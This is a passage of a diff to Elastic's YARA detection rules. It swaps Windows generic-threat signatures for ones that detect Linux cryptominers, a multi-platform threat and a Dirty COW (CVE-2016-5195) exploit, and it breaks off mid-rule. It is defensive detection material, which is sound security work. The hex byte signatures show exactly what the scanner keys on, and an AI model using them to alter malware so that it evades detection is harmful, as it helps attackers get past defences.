"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L301-L319" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a12a1e8253ee1244b018fd3bdcb6b7729dfe16e06aed470f6b08344a110a4061" + logic_hash = "084ba60d8464ef5bf3a3aa942bb88caf447c6cee3ebf023157bd261226057663" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "c74c1dc7588d01112c3995b17e9772af15fb1634ebfb417b8c0069ac1f334e74" - severity = 50 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "96d1ed843aeb59dd43dd76f4edd9e9928dd29f86df87b70d875473b9d908e75c" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 51 8B 45 0C 48 89 45 FC EB 07 8B 45 FC 48 89 45 FC 83 7D FC 00 7C 0B 8B 45 08 03 45 FC C6 00 00 EB E8 C9 C3 55 8B EC 83 EC 0C 8B 45 0C 89 45 FC 8B 45 08 3B 45 10 76 2F 8B 45 FC 89 45 } + $a = { FF FF 88 45 F7 80 7D F7 FF 75 D6 B8 ?? ?? 04 08 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_F45B3F09 : FILE MEMORY +rule ELASTIC_Multi_Generic_Threat_19854Dc2 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Multi Generic Threat (Multi.Generic.Threat)" author = "Elastic Security" - id = "f45b3f09-4203-41f7-870e-d8ef5126c391" - date = "2024-03-05" + id = "19854dc2-a568-4f6c-bd47-bcae9976c66f" + date = "2024-02-21" modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3164-L3182" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "577f1dbd76030c7e44ed28c748551691d446e268189af94e1fa1545f06395178" - logic_hash = "9b01ad1271cc5052a793e5a885aa7289cbaea4a928f60d64194477c3036496ed" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Multi_Generic_Threat.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "be216fa9cbf0b64d769d1e8ecddcfc3319c7ca8e610e438dcdfefc491730d208" + logic_hash = "beed6d6cd7b7b6eb3f4ab6a45fd19f2ebfb661e470d468691b68634994e2eef7" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "dfa72e0780e895ab5aa2369a425c64144e9bd435e55d8a0fefbe08121ae31df5" + fingerprint = "64d3803490fa71f720678ca2989cc698ea9b1a398d02d6d671fa01e0ff42f8b5" severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "multi" strings: - $a1 = { 28 33 ED 44 8B ED 48 89 6C 24 78 44 8B FD 48 89 AC 24 88 00 00 00 44 8B F5 44 8B E5 E8 43 04 00 00 48 8B F8 8D 75 01 ?? ?? ?? ?? ?? 66 39 07 75 1A 48 63 47 3C 48 8D 48 C0 } + $a1 = { 26 2A 73 74 72 75 63 74 20 7B 20 45 6E 74 72 79 53 61 6C 74 20 5B 5D 75 69 6E 74 38 3B 20 4C 65 6E 20 69 6E 74 20 7D } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_3F390999 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Attribute_3683D149 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Attribute (Linux.Cryptominer.Attribute)" author = "Elastic Security" - id = "3f390999-601f-464e-8982-09553adee303" - date = "2024-03-05" - modified = "2024-06-12" + id = "3683d149-fa9c-4dbb-85b9-8ce2b1d1d128" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3184-L3202" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1b6fc4eaef3515058f85551e7e5dffb68b9a0550cd7f9ebcbac158dac9ababf1" - logic_hash = "462a7a38ebbb39515ac2c0a10353660d0cadcfb99360adcd200edc1db5a716ba" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Attribute.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ec9e74d52d745275718fe272bfd755335739ad5f680f73f5a4e66df6eb141a63" + logic_hash = "71aa8aa4171671af4aa0271b64da95ac1d8766de12a949c97ebcac9369224ecd" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "ccfd5fb305ea48d66f299311c5332587355258bdeeb25cb90c450e8e96df3052" - severity = 50 + fingerprint = "31f45578eab3c94cff52056a723773d41aaad46d529b1a2063a0610d5948a633" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 10 48 89 D9 48 8B 59 10 FF 61 08 0F 1F 40 00 49 89 CB C3 49 89 CA 41 8B 43 08 41 FF 23 C3 90 48 C1 E1 04 31 C0 81 E1 F0 0F 00 00 49 01 C8 4C 8D 0C 02 4E 8D 14 00 31 C9 45 8A 1C 0A 48 } + $a = { 20 74 6F 20 66 61 73 74 29 20 6F 72 20 39 20 28 61 75 74 6F } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Abd1C09D : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_D7Bd0E5D : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "abd1c09d-ec66-45ee-b435-302c736cc1f9" - date = "2024-03-05" - modified = "2024-06-12" + id = "d7bd0e5d-3528-4648-aaa5-6cf44d22c0d5" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3204-L3222" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3ff09d2352c2163465d8c86f94baa25ba85c35698a5e3fbc52bc95afc06b7e85" - logic_hash = "80e6f317e5cd91cb3819e9251efc8c96218071bec577a38c8784826dd4a657cb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "afcfd67af99e437f553029ccf97b91ed0ca891f9bcc01c148c2b38c75482d671" + logic_hash = "1f87721fdfe58d029c0696bc99385a0052c771bc48b2c9ce01b72c3e42359654" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2f75d8fa11f67f983e40ada50a07e8a6f1b6dfc663524e35a6526381e939d39f" - severity = 50 + fingerprint = "fbc06c7603aa436df807ad3f77d5ba783c4d33f61b06a69e8641741068f3a543" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 83 EC 0C 8B D1 53 56 57 8B 7D 0C 83 FF 08 77 1A 85 FF 74 16 8B 5D 08 8B 4A 14 8B 72 10 2B CE 8D 04 3B 3B C1 72 11 C6 42 44 00 33 C0 33 D2 5F 5E 5B 8B E5 5D C2 08 00 0F 57 C0 66 0F 13 } + $a = { CF 99 67 D8 37 AA 24 80 F2 F3 47 6A A5 5E 88 50 F1 28 61 18 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_B7870213 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_69E1A763 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "b7870213-e235-4b2d-83c1-e3c7c486ee8d" - date = "2024-03-05" - modified = "2024-06-12" + id = "69e1a763-1e0d-4448-9bc4-769f3a36ac10" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3224-L3242" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "04cb0d5eecea673acc575e54439398cc00e78cc54d8f43c4b9bc353e4fc4430d" - logic_hash = "79b8385543def42259cd9c09d4d7059ff6bb02a9e87cff1bc0a8861e3b333c5f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b04d9fabd1e8fc42d1fa8e90a3299a3c36e6f05d858dfbed9f5e90a84b68bcbb" + logic_hash = "d0dac8e2c9571d9e622c8c1250a54a7671ad1b9b00dba584c3741b714c22d8e0" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "c087f84c8572dba64da62c9f317969cbce46e78656e0a75489788add787c2781" - severity = 50 + fingerprint = "9007ab73902ef9bfa69e4ddc29513316cb6aa7185986cdb10fd833157cd7d434" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 75 28 6B 6E 4E 30 30 30 31 30 32 30 33 30 34 30 35 30 36 30 37 30 38 30 39 31 30 31 31 31 32 31 33 31 34 31 35 31 36 31 37 31 38 31 39 32 30 32 31 32 32 32 33 32 34 32 35 32 36 32 37 32 38 32 39 33 30 33 31 33 32 33 33 33 34 33 35 33 36 33 37 33 38 33 39 34 30 34 31 34 32 34 33 34 34 34 35 34 36 34 37 34 38 34 39 35 30 35 31 35 32 35 33 35 34 35 35 35 36 35 37 35 38 35 39 36 30 36 31 36 32 36 33 36 34 36 35 36 36 36 37 36 38 36 39 37 30 37 31 37 32 37 33 37 34 37 35 37 36 37 37 37 38 37 39 38 30 38 31 38 32 38 33 38 34 38 35 38 36 38 37 38 38 38 39 39 30 39 31 39 32 39 33 39 34 39 35 39 36 39 37 39 38 39 39 } + $a = { 43 08 49 89 46 08 48 8B 43 10 49 89 46 10 48 85 C0 74 8A F0 83 40 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_2Bba6Bae : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_397A86Bd : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "2bba6bae-7c6a-4b89-83d8-0656d7863820" - date = "2024-03-05" - modified = "2024-06-12" + id = "397a86bd-6d66-4db0-ad41-d0ae3dbbeb21" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3244-L3262" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d9955c716371422750b77d64256dade6fbd028c8d965db05c0d889d953480373" - logic_hash = "59e4b173c21b0ab161adf8d89f253f21403bca706b6bf40b3da00697f87dd509" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "79c47a80ecc6e0f5f87749319f6d5d6a3f0fbff7c34082d747155b9b20510cde" + logic_hash = "6b46a82d1aea0357f5a48c9ae1d93e3d4d31bd98b9c9b4e0b0d0629e7f159499" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "85dc02cb74c481b5ecb144280827add9665138f0b5d479db5468a94b41e662a3" - severity = 50 + fingerprint = "0bad343f28180822bcb45b0a84d69b40e26e5eedb650db1599514020b6736dd0" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 36 35 20 37 39 20 34 31 20 36 39 20 36 34 20 34 38 20 36 43 20 37 37 20 34 39 20 36 41 20 36 46 20 36 37 20 34 39 20 36 42 20 37 30 20 35 38 20 35 36 20 34 33 20 34 39 20 37 33 20 34 39 20 34 33 20 34 41 20 36 38 20 36 32 20 34 37 20 36 33 20 36 39 20 34 46 20 36 39 20 34 31 20 36 39 20 35 32 20 35 37 20 35 32 20 34 35 20 35 35 20 33 30 20 34 35 20 36 39 20 34 39 20 34 38 20 33 30 } + $a = { 74 4F 48 8B 75 00 48 8B 4D 08 4C 89 F7 48 8B 55 10 48 8B 45 18 48 89 74 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_4Db75701 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_37C3F8D3 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "4db75701-e7d6-4231-ba00-e127da90bfce" - date = "2024-03-05" - modified = "2024-06-12" + id = "37c3f8d3-9d79-434c-b0e8-252122ebc62a" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3264-L3282" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fa7847d21d5a350cf96d7ecbcf13dce63e6a0937971cfb479700c5b31850bba9" - logic_hash = "65f7d15ed551e069b30ce6c0a5f15d01d24b8b29727950269c9956fcf6dc799d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "efbddf1020d0845b7a524da357893730981b9ee65a90e54976d7289d46d0ffd4" + logic_hash = "e7bdd185ea4227b0960c3e677e7d8ac7488d53eaa77efd631be828b2ca079bb8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d8637b329a212bf37367ba3cc3acf65c9b511d1f06d689d792c519324459530d" - severity = 50 + fingerprint = "6ba0bae987db369ec6cdadf685b8c7184e6c916111743f1f2b43ead8d028338c" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 48 81 EC D0 02 00 00 80 79 20 08 41 8B F1 45 8B F0 4C 8B FA 48 8B F9 0F 84 3A 01 00 00 48 89 58 10 48 89 68 18 43 8D 04 40 48 63 C8 ?? ?? ?? ?? ?? 48 8D 8C 24 20 02 00 00 } + $a = { F0 4C 01 F0 49 8B 75 08 48 01 C3 49 39 F4 74 29 48 89 DA 4C } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_54A914C9 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_28A80546 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "54a914c9-1b00-4cea-9b82-f7ed1df1305f" - date = "2024-03-25" - modified = "2024-06-12" + id = "28a80546-ae74-4616-8896-50f54da66650" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3284-L3302" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c418c5ad8030985bb5067cda61caba3b7a0d24cb8d3f93fc09d452fbdf4174ec" - logic_hash = "0cc3797564b4c722423f915493e07b0e0fec3085e7a535f9914f82d73c797bed" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L81-L99" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "96cc225cf20240592e1dcc8a13a69f2f97637ed8bc89e30a78b8b2423991d850" + logic_hash = "120e9f7cad0fc8aebd843374c0edca8cbb701882ab55a7f24aced1d80d8cd697" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d3f4083c96130031ce9656ea31bf0914080c88f09c05f8b1168c60487af80c9b" - severity = 50 + fingerprint = "7f49f04ba36e7ff38d313930c469d64337203a60792f935a3548cee176ae9523" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 20 48 89 CB 48 8B 43 08 4C 8B 48 30 4D 85 C9 74 16 48 8D 4B 10 0F B6 D2 48 83 C4 20 5B 5E 5F 5D 41 5C 49 FF E1 66 90 44 0F B6 40 10 41 80 F8 16 0F 84 81 00 00 00 41 80 F8 18 74 0B 48 } + $a = { 72 59 D4 B5 63 E2 4D B6 08 EF E8 0A 3A B1 AD 1B 61 6E 7C 65 D1 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_38A88967 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_9D531F70 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "38a88967-db0e-4d68-9295-9108cbc98fb9" - date = "2024-03-25" - modified = "2024-06-12" + id = "9d531f70-c42f-4e1a-956a-f9ac43751e73" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3304-L3322" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6e425eb1a27c4337f05d12992e33fe0047e30259380002797639d51ef9509739" - logic_hash = "ddbdb1c39a07141d83173504214c889aff75487570d906413ebc6f262fedf9ae" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "36f2ce4e34faf42741f0a15f62e8b3477d69193bf289818e22d0e3ee3e906eb0" + logic_hash = "87d3cb7049975d52f2a6d6aa10e6b6d0d008d166ca5f9889ad1413a573d8b58e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1fef2c4c2899bbf9f45732d23654f6437658de2c4dc78dc3d1ff5440b5c2cbcf" - severity = 50 + fingerprint = "2c6019f7bc2fc47d7002e0ba6e35513950260b558f1fdc732d3556dabbaaa93d" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 60 E8 00 00 00 00 5B ?? ?? ?? ?? ?? ?? 8B 75 08 8B 7D 0C AD 50 53 89 C1 29 DB 29 C0 AC C1 E3 04 01 C3 AA 89 D8 ?? ?? ?? ?? ?? 85 C0 74 07 89 C2 C1 EA 18 31 D3 F7 D0 21 C3 E2 DF 87 DA } + $a = { 49 10 58 00 10 D4 34 80 08 30 01 20 02 00 B1 00 83 49 23 16 54 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_E8Abb835 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_23A5C29A : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "e8abb835-f0c1-4e27-a0ca-3a3cae3362df" - date = "2024-03-26" - modified = "2024-06-12" + id = "23a5c29a-6a8f-46f4-87ba-2a60139450ce" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3324-L3342" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e42262671325bec300afa722cefb584e477c3f2782c8d4c6402d6863df348cac" - logic_hash = "0ad56b8c741a79a600a0d5588c4e8760a6d19fef72ff7814a00cfb84a90f23aa" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L121-L139" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1320d7a2b5e3b65fe974a95374b4ea7ed1a5aa27d76cd3d9517d3a271121103f" + logic_hash = "c2608e7ee73102e0737a859a18c5482877c6dc0e597d8a14d8d41f5e01a0b1f4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ca8c2f4b16ebe1bb48c91a536d8aca98bed5592675eff9311e77d7e06dfe3c5b" - severity = 50 + fingerprint = "1a7a86ff6e1666c2da6e6f65074bb1db2fe1c97d1ad42d1f670dd5c88023eecf" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 48 81 EC 28 05 00 00 66 44 0F 7F 84 24 10 05 00 00 66 0F 7F BC 24 00 05 00 00 0F 29 B4 24 F0 04 00 00 44 89 44 24 74 48 89 94 24 C8 00 00 00 48 89 CB 48 C7 44 24 78 00 00 00 00 0F 57 F6 0F 29 } + $a = { C1 48 29 D0 48 01 C0 4D 8B 39 48 29 C1 49 29 F8 48 8D 04 C9 4D 8D } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_492D7223 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_Ea5703Ce : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "492d7223-4e03-4a77-83e5-ed85e052f846" - date = "2024-03-26" - modified = "2024-06-12" + id = "ea5703ce-4ad4-46cc-b253-8d022ca385a3" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3344-L3362" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c0d9c9297836aceb4400bcb0877d1df90ca387f18f735de195852a909c67b7ef" - logic_hash = "9fb2a00def86ed8476d906514a0bc630e28093ac37d757541d8801d2c8e0efc3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L141-L159" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "bec6eea63025e2afa5940d27ead403bfda3a7b95caac979079cabef88af5ee0b" + logic_hash = "bbf0191ecff24fd24376fd3dec2e96644188ca4d26b4ca4f087e212bae2eab85" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "71a1bce450522a0a6ff38d2f84ab91e2e9db360736c2f7233124a0b0dc4d0431" - severity = 50 + fingerprint = "a58a41ab4602380c0989659127d099add042413f11e3815a5e1007a44effaa68" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 89 E5 53 57 56 83 EC 24 ?? ?? ?? ?? ?? 31 C9 85 C0 0F 94 C1 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 C8 40 FF E0 } + $a = { 0F 94 C0 EB 05 B8 01 00 00 00 44 21 E8 48 8B 4C 24 08 64 48 33 0C 25 28 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Ea296356 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_6A4F4255 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "ea296356-6533-4364-8ad1-3bbb538e3d61" - date = "2024-05-22" - modified = "2024-06-12" + id = "6a4f4255-d202-48b7-96ae-cb7211dcbea3" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3364-L3382" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4c48a0fe90f3da7bfdd32961da7771a0124b77e1ac1910168020babe8143e959" - logic_hash = "73ffd16f0047cd57311853aa9083fc21427f2eb21646c6edc7b8def86da90f90" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L161-L179" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8cfc38db2b860efcce5da40ce1e3992f467ab0b7491639d68d530b79529cda80" + logic_hash = "133290dc7423174bb3b41b152bab038d118b47baaca52705b66fd9be01692a03" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a17ca2f95473517428867b4f68b8275ae84ef1ee39421e76887077e206b1ed51" - severity = 50 + fingerprint = "0ed37d7eccd4e36b954824614b976e1371c3b2ffe318345d247198d387a13de6" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 55 8B EC 83 EC 0C 53 56 8B 75 08 8B C6 89 55 FC 99 2B C2 89 4D F8 8B D8 8B 45 FC 57 D1 FB 33 FF 8D 14 30 89 55 08 85 DB 7E 36 4A 0F 1F 44 00 00 8A 0C 38 8D 52 FF 0F B6 42 01 8B 75 FC 0F B6 80 } + $a = { FD 48 8D 5D 01 4C 8D 14 1B 48 C1 E3 05 4C 01 EB 4D 8D 7A FF F2 0F } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_Aeaeb5Cf : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_9088D00B : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "aeaeb5cf-2683-4a88-b736-4b8873d92fc5" - date = "2024-05-22" - modified = "2024-06-12" + id = "9088d00b-622a-4cbf-9600-6dfcf2fc0c2c" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L3384-L3402" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f57d955d485904f0c729acff9db1de9cb42f32af993393d58538f07fa273b431" - logic_hash = "640966296bad70234e0fe7b6f87b92fcf4fc111189d307d44f32e926785f76cb" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L181-L199" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8abb2b058ec475b0b6fd0c994685db72e98d87ee3eec58e29cf5c324672df04a" + logic_hash = 